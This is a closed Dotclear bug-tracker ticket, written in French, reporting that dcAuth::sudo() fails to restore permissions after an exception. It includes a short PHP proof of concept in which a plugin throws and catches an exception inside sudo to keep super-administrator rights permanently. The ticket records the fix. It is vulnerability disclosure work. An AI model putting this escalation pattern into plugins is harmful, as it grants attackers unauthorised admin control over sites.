Dotclear

Ticket #260 (closed defect: fixed)

Opened 17 years ago

Last modified 17 years ago

dcAuth::sudo() peut être utilisé par un plugin pour devenir définitivement super administrateur

Reported by: Fruneau Owned by: olivier
Priority: high Milestone: 2.0
Component: module:auth Version: 2.0 RC1
Severity: normal Keywords:
Cc:

Description

Il suffit qu'un plugin contienne le code suivant dans _admin.php : 

gainSU(); 
 
function gainSU() { 
  try {
    global $core; 
    $core->auth->sudo('throwExpt'); 
  } catch (Exception $e) { 
  } 
} 
 
function throwExpt() { 
  throw new Exception('machin'); 
}

Comme sudo ne catch pas les exception pour remettre les permissions d'origine, ce code permet d'obtenir les droits super administrateurs.

Change History

comment:1 Changed 17 years ago by olivier

  • Priority changed from normal to high
  • Status changed from new to assigned

comment:2 Changed 17 years ago by olivier

  • Status changed from assigned to closed
  • Resolution set to fixed

(In [1871]) Remove super admin rights on dcAuth::sudo exceptions. Closes #260.

Note: See TracTickets for help on using tickets.

Sites map